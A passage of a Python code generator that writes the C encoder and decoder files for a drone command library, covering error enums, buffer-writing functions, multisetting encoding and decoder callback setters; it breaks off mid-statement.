hfile.write ('typedef enum {\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ' = 0, ///< No error occurred\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'BAD_ARGS') + ', ///< At least one of the arguments is invalid\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ', ///< The given output buffer was not large enough for the command\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'ERROR') + ', ///< Any other error\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('\n')
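# Hedged usage sketch of the generator functions declared below (the function and enum
# names are illustrative; the real ones are produced by ARFunctionName/AREnumValue):
#   uint8_t buf[128];
#   int32_t cmdLen = 0;
#   eARCOMMANDS_GENERATOR_ERROR err =
#       ARCOMMANDS_Generator_GenerateSomeFeatureSomeCommand (buf, sizeof (buf), &cmdLen, ...);
#   // on success (OK), buf[0..cmdLen-1] holds the binary command, ready to be sent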
for ftr in allFeatures:
hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n\n')
for cmd in ftr.cmds + ftr.evts:
hfile.write ('\n/**\n')
hfile.write (' * @brief ' + cmd.doc.desc.replace('\n', '\n * ') + '\n')
if cmd.isDeprecated:
hfile.write (' * @deprecated\n')
hfile.write (' * @warning A command is not NULL terminated and can contain NULL bytes.\n')
hfile.write (' * @param buffer Pointer to the buffer in which the library should store the command\n')
hfile.write (' * @param buffLen Size of the buffer\n')
hfile.write (' * @param cmdLen Pointer to an integer that will hold the actual size of the command\n')
for arg in cmd.args:
hfile.write (' * @param _' + arg.name + ' ' + get_arg_doc(arg).replace('\n', '\\n') + '\n')
#If the argument is a bitfield
if isinstance(arg.argType, ArBitfield):
hfile.write (' * @param _' + arg.name + ' a combination of')
#Find the feature owning the enum
for bitFieldFtr in allFeatures:
for enum2 in bitFieldFtr.enums:
if enum2 == arg.argType.enum:
break
else:
continue
break
for eVal in arg.argType.enum.values:
hfile.write (' ; ' + ARFlagValue(LIB_MODULE, bitFieldFtr.name , arg.argType.enum.name, eVal.name))
hfile.write ('\n')
hfile.write (' * @return Error code (see ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ')\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd))) + ' (uint8_t *buffer, int32_t buffLen, int32_t *cmdLen')
for arg in cmd.args:
hfile.write (', ' + xmlToCwithConst (LIB_MODULE, ftr, cmd, arg, True) + ' _' + arg.name)
hfile.write (');\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('#endif /* ' + COMMANDSGEN_DEFINE + ' */\n')
hfile.close ()
#################################
# 6TH PART : #
#################################
# Generate coder C part #
#################################
cfile = open (paths.COMMANDSGEN_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <config.h>\n')
cfile.write ('#include "' + COMMANDSRW_HFILE_NAME + '"\n')
cfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSGEN_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSID_HFILE_NAME + '>\n')
cfile.write ('\n')
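# The generator functions emitted below always start a command with the 4-byte header
# declared in the types H file (the HEADER 'SIZE' macro): a uint8_t feature id, a uint8_t
# class id (or the generic FEATURE_CLASS id for class-less commands), and a uint16_t
# command id, followed by the encoded arguments.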
for ftr in allFeatures:
cfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd))) + ' (uint8_t *buffer, int32_t buffLen, int32_t *cmdLen')
for arg in cmd.args:
cfile.write (', ' + xmlToCwithConst (LIB_MODULE, ftr, cmd, arg, True) + ' _' + arg.name)
cfile.write (')\n')
cfile.write ('{\n')
cfile.write (' int32_t currIndexInBuffer = 0;\n')
if [arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)]:
cfile.write (' int32_t currFreeSizeInBuffer = 0;\n')
cfile.write (' int32_t multisetSize = 0;\n')
cfile.write (' int32_t multisetSizeIndex = 0;\n')
cfile.write (' int32_t cmdSize = 0;\n')
cfile.write (' int32_t cmdSizeIndex = 0;\n')
cfile.write (' int32_t cmdIndex = 0;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ';\n')
cfile.write (' if ((buffer == NULL) ||\n')
for arg in cmd.args:
if isinstance(arg.argType, ArMultiSetting):
cfile.write (' (_' + arg.name + ' == NULL) ||\n')
cfile.write (' (cmdLen == NULL))\n')
cfile.write (' {\n')
cfile.write (' return ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'BAD_ARGS') + ';\n')
cfile.write (' } // No else --> Args Check\n')
hasStringArgs = False
for arg in cmd.args:
if arg.argType == ArArgType.STRING:
hasStringArgs = True
break
if hasStringArgs:
cfile.write (' // Test all String args (if any)\n')
cfile.write (' if (')
first = True
for arg in cmd.args:
if ArArgType.STRING == arg.argType:
if first:
first = False
else:
cfile.write (' ')
cfile.write ('(_' + arg.name + ' == NULL) ||\n')
cfile.write (' (0))\n')
cfile.write (' {\n')
cfile.write (' return ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'BAD_ARGS') + ';\n')
cfile.write (' } // No else --> Args Check\n')
cfile.write ('\n')
cfile.write (' // Write feature header\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU8ToBuffer') + ' (buffer, ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ', currIndexInBuffer, buffLen);\n')
cfile.write (' if (currIndexInBuffer == -1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no issue was found\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' // Write class header\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
classIdName = ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS') if cmd.cls is None else AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cmd.cls.name)
cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU8ToBuffer') + ' (buffer, ' + classIdName + ', currIndexInBuffer, buffLen);\n')
cfile.write (' if (currIndexInBuffer == -1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no issue was found\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' // Write id header\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cmdIdName = AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) if cmd.cls is None else AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cmd.cls.name + '_CMD', cmd.name)
cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (buffer, ' + cmdIdName + ', currIndexInBuffer, buffLen);\n')
cfile.write (' if (currIndexInBuffer == -1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no issue was found\n')
cfile.write (' } // No else --> Processing block\n')
for arg in cmd.args:
if isinstance(arg.argType, ArMultiSetting):
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' multisetSizeIndex = currIndexInBuffer;\n')
cfile.write (' currIndexInBuffer += sizeof(uint16_t);\n')
cfile.write (' }\n')
cfile.write ('\n')
for multiset_msg in arg.argType.msgs:
cfile.write (' if ((retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ') && (_'+arg.name+'->'+multiset_msg.name+'.isSet))\n')
cfile.write (' {\n')
cfile.write (' cmdSizeIndex = currIndexInBuffer;\n')
cfile.write (' cmdIndex = cmdSizeIndex + sizeof(uint16_t);\n')
cfile.write (' currFreeSizeInBuffer = buffLen - cmdIndex;\n')
cfile.write (' // Write the command\n')
cfile.write (' retVal = ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (format_cmd_name(multiset_msg))) + ' (buffer + cmdIndex, currFreeSizeInBuffer, &cmdSize')
for multiset_msg_arg in multiset_msg.args:
cfile.write (', _' + arg.name+'->'+multiset_msg.name+'.'+multiset_msg_arg.name)
cfile.write (');\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') +')\n')
cfile.write (' {\n')
cfile.write (' // Write command size before the command\n')
cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (buffer, cmdSize, cmdSizeIndex, cmdSizeIndex + sizeof(uint16_t));\n')
cfile.write (' if (currIndexInBuffer == -1)\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' // Update current Index\n')
cfile.write (' currIndexInBuffer += cmdSize;\n')
cfile.write (' // Update Multiset Size\n')
cfile.write (' multisetSize += sizeof(uint16_t) + cmdSize;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' // Write multiset size before all commands\n')
cfile.write (' multisetSizeIndex = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (buffer, multisetSize, multisetSizeIndex, multisetSizeIndex + sizeof(uint16_t));\n')
cfile.write (' if (multisetSizeIndex == -1)\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' }\n')
cfile.write ('\n')
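# Note on the multiset encoding generated above: a uint16_t slot is reserved for the total
# multiset size, each set command is then written as '<uint16_t cmdSize><command bytes>',
# and the accumulated size is finally patched back into the reserved slot.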
else:
cfile.write (' // Write arg _' + arg.name + '\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Add' + xmlToSize (ftr, cmd, arg) + 'ToBuffer') + ' (buffer, _' + arg.name + ', currIndexInBuffer, buffLen);\n')
cfile.write (' if (currIndexInBuffer == -1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no issue was found\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' *cmdLen = currIndexInBuffer;\n')
cfile.write (' } // No else --> Do not set cmdLen if an error occurred\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('// END GENERATED CODE\n')
cfile.close ()
#################################
# 7TH PART : #
#################################
# Generate public decoder H file#
#################################
hfile = open (paths.COMMANDSDEC_HFILE, 'w')
hfile.write (LICENCE_HEADER)
hfile.write ('/**\n')
hfile.write (' * @file ' + COMMANDSDEC_HFILE_NAME + '\n')
hfile.write (' * @brief libARCommands decoder header.\n')
hfile.write (' * This file contains all declarations needed to decode commands\n')
hfile.write (' * @note Autogenerated file\n')
hfile.write (' **/\n')
hfile.write ('#ifndef ' + COMMANDSDEC_DEFINE + '\n')
hfile.write ('#define ' + COMMANDSDEC_DEFINE + '\n')
hfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
hfile.write ('#include <inttypes.h>\n')
hfile.write ('\n')
hfile.write ('#ifdef __GNUC__\n')
hfile.write ('#define DEPRECATED __attribute__ ((deprecated))\n')
hfile.write ('#elif defined(_MSC_VER)\n')
hfile.write ('#define DEPRECATED __declspec(deprecated)\n' )
hfile.write ('#else\n')
hfile.write ('#define DEPRECATED\n')
hfile.write ('#endif\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Error codes for ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' function\n')
hfile.write (' */\n')
hfile.write ('typedef enum {\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' = 0, ///< No error occurred\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NO_CALLBACK') + ', ///< No error, but no callback was set (so the call had no effect)\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ', ///< The command buffer contained an unknown command\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ', ///< The command buffer did not contain enough data for the specified command\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ', ///< The string buffer was not big enough for the command description\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ', ///< Any other error\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief ARCOMMANDS_Decoder object holder\n')
hfile.write (' */\n')
hfile.write ('typedef struct ARCOMMANDS_Decoder_t ARCOMMANDS_Decoder_t;\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Creates a new ARCOMMANDS_Decoder_t\n')
hfile.write (' * @warning This function allocates memory.\n')
hfile.write (' * @note The memory must be freed by a call to ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + '.\n')
hfile.write (' * @return A new ARCOMMANDS_Decoder_t instance. NULL in case of error.\n')
hfile.write (' */\n')
hfile.write ('ARCOMMANDS_Decoder_t* ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'NewDecoder') + ' (' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' *error);\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Deletes an ARCOMMANDS_Decoder_t\n')
hfile.write (' * @param decoder The Decoder to delete.\n')
hfile.write (' */\n')
hfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + ' (ARCOMMANDS_Decoder_t **decoder);\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Decode a command\n')
hfile.write (' * On success, the callback set for the command will be called in the current thread.\n')
hfile.write (' * @param decoder the decoder instance\n')
hfile.write (' * @param buffer the command buffer to decode\n')
hfile.write (' * @param buffLen the length of the command buffer\n')
hfile.write (' * @return ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' on success, any error code otherwise\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
hfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeCommand') + ' (ARCOMMANDS_Decoder_t *decoder, const uint8_t *buffer, int32_t buffLen);\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Decode a command buffer\n')
hfile.write (' * On success, the callback set for the command will be called in the current thread.\n')
hfile.write (' * @param buffer the command buffer to decode\n')
hfile.write (' * @param buffLen the length of the command buffer\n')
hfile.write (' * @return ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' on success, any error code otherwise\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
hfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' (const uint8_t *buffer, int32_t buffLen) DEPRECATED;\n')
hfile.write ('\n')
hfile.write ('\n/**\n')
hfile.write (' * @brief Describe a command buffer\n')
hfile.write (' * @param buffer the command buffer to decode\n')
hfile.write (' * @param buffLen the length of the command buffer\n')
hfile.write (' * @param resString the string pointer in which the description will be stored\n')
hfile.write (' * @param stringLen the length of the string pointer\n')
hfile.write (' * @return ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' on success, any error code otherwise\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
hfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' (uint8_t *buffer, int32_t buffLen, char *resString, int32_t stringLen);\n')
hfile.write ('\n')
for ftr in allFeatures:
hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n\n')
for cmd in ftr.cmds + ftr.evts:
for multiset_arg in [arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)]:
hfile.write ('/**\n')
hfile.write (' * @brief Decode a '+ARTypeName (LIB_MODULE, get_ftr_old_name(ftr), multiset_arg.argType.name)+'\n')
hfile.write (' * On success, the callback set for each command of the multisetting will be called in the current thread.\n')
hfile.write (' * @param decoder the decoder instance\n')
hfile.write (' * @param multisetting the multisetting to decode\n')
hfile.write (' * @return ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' on success, any error code otherwise\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
hfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Decode'+ARCapitalize(ftr.name)+ARCapitalize(cmd.name)) + ' (ARCOMMANDS_Decoder_t *decoder, '+xmlToC(LIB_MODULE, ftr, cmd, multiset_arg, True)+' multisetting);\n')
hfile.write ('\n')
brefCmdName = cmd.name if cmd.cls is None else cmd.cls.name + '.' + cmd.name
hfile.write ('\n/**\n')
hfile.write (' * @brief callback type for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n')
hfile.write (' */\n')
hfile.write ('typedef void (*' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ') (')
first = True
for arg in cmd.args:
if first:
first = False
else:
hfile.write (', ')
hfile.write (xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg, True) + ' ' + arg.name)
if not first:
hfile.write (', ')
hfile.write ('void *custom);\n')
hfile.write ('/**\n')
hfile.write (' * @brief Decoder callback setter for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n')
hfile.write (' * @param decoder the decoder instance\n')
hfile.write (' * @param callback new callback for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n')
hfile.write (' * @param custom pointer that will be passed to all calls to the callback\n')
hfile.write (' */\n')
hfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' (ARCOMMANDS_Decoder_t *decoder, ' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' callback, void *custom);\n')
hfile.write ('/**\n')
hfile.write (' * @brief callback setter for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n')
hfile.write (' * @param callback new callback for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n')
hfile.write (' * @param custom pointer that will be passed to all calls to the callback\n')
hfile.write (' */\n')
hfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' (' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' callback, void *custom) DEPRECATED;\n')
hfile.write ('\n')
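# For reference, each command declared above gets a callback typedef taking the command
# arguments plus a 'void *custom' pointer, a per-decoder setter (Set<Ftr><Cmd>Cb) and a
# deprecated global setter (Set<Ftr><Cmd>Callback) kept for the legacy DecodeBuffer path.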
hfile.write ('#endif /* ' + COMMANDSDEC_DEFINE + ' */\n')
hfile.close ()
#################################
# 8TH PART : #
#################################
# Generate decoder C part #
#################################
cfile = open (paths.COMMANDSDEC_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <config.h>\n')
cfile.write ('#include <stdio.h>\n')
cfile.write ('#include "' + COMMANDSRW_HFILE_NAME + '"\n')
cfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSDEC_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSID_HFILE_NAME + '>\n')
cfile.write ('#include <libARSAL/ARSAL_Mutex.h>\n')
cfile.write ('\n')
cfile.write ('// ARCOMMANDS_Decoder_t structure definition\n')
cfile.write ('struct ARCOMMANDS_Decoder_t\n')
cfile.write ('{\n')
cfile.write (' ARSAL_Mutex_t mutex;\n\n')
for ftr in allFeatures:
cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (' ' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' ' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(format_cmd_name(cmd)) + 'Callback;\n')
cfile.write (' void *' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(format_cmd_name(cmd)) + 'Custom;\n')
cfile.write ('\n')
cfile.write ('};\n')
cfile.write ('\n')
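# Note: the decoder instance stores one <Ftr><Cmd>Callback / <Ftr><Cmd>Custom pair per
# command; the ARSAL mutex declared above is used by the setters to guard registration.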
cfile.write ('\n')
cfile.write ('// Constructor\n')
cfile.write ('ARCOMMANDS_Decoder_t* ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'NewDecoder') + ' (' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' *error)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Decoder_t *decoder = NULL;\n')
cfile.write (' int err = 0;\n')
cfile.write ('\n')
cfile.write (' decoder = calloc(1, sizeof(*decoder));\n')
cfile.write (' if (decoder == NULL)\n')
cfile.write (' goto end;\n')
cfile.write ('\n')
cfile.write (' err = ARSAL_Mutex_Init (&decoder->mutex);\n')
cfile.write (' if (err != 0) {\n')
cfile.write (' free(decoder);\n')
cfile.write (' decoder = NULL;\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write ('end:\n')
cfile.write (' if (error)\n')
cfile.write (' *error = decoder ? ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' : ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write ('\n')
cfile.write (' return decoder;\n')
cfile.write ('}\n\n')
cfile.write ('// Destructor\n')
cfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + ' (ARCOMMANDS_Decoder_t **decoder)\n')
cfile.write ('{\n')
cfile.write (' if (decoder && (*decoder)) {\n')
cfile.write (' ARSAL_Mutex_Destroy(&(*decoder)->mutex);\n')
cfile.write (' free(*decoder);\n')
cfile.write (' *decoder = NULL;\n')
cfile.write (' }\n')
cfile.write ('}\n\n')
cfile.write ('// CALLBACK VARIABLES + SETTERS\n')
cfile.write ('\n')
cfile.write ('static ARSAL_Mutex_t ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ';\n')
cfile.write ('static int ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'isInit') + ' = 0;\n')
cfile.write ('static int ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Init') + ' (void)\n')
cfile.write ('{\n')
cfile.write (' if ((' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'isInit') + ' == 0) &&\n')
cfile.write (' (ARSAL_Mutex_Init (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ') == 0))\n')
cfile.write (' {\n')
cfile.write (' ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'isInit') + ' = 1;\n')
cfile.write (' } // No else --> Do nothing if already initialized\n')
cfile.write (' return ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'isInit') + ';\n')
cfile.write ('}\n')
cfile.write ('\n')
for ftr in allFeatures:
cfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n\n')
for cmd in ftr.cmds + ftr.evts:
for multiset_arg in [arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)]:
cfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
cfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Decode'+ARCapitalize(ftr.name)+ARCapitalize(cmd.name)) + ' (ARCOMMANDS_Decoder_t *decoder, '+xmlToC(LIB_MODULE, ftr, cmd, multiset_arg, True)+' multisetting)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write (' if ((NULL == decoder) ||\n')
cfile.write (' (NULL == multisetting))\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> Arg check\n')
cfile.write (' \n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
for multiset_msg in multiset_arg.argType.msgs:
if multiset_msg.cls:
DECODER_CBNAME = ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (multiset_msg.cls.name) + ARCapitalize (multiset_msg.name) + 'Callback'
DECODER_CBCUSTOMNAME = ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (multiset_msg.cls.name) + ARCapitalize (multiset_msg.name) + 'Custom'
else:
